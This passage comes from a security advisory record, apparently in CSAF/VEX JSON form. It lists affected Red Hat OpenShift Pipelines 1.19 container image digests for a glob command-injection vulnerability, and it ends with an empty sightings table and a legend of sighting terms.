"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "glob: glob: Command Injection Vulnerability via Malicious Filenames"
}
]
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.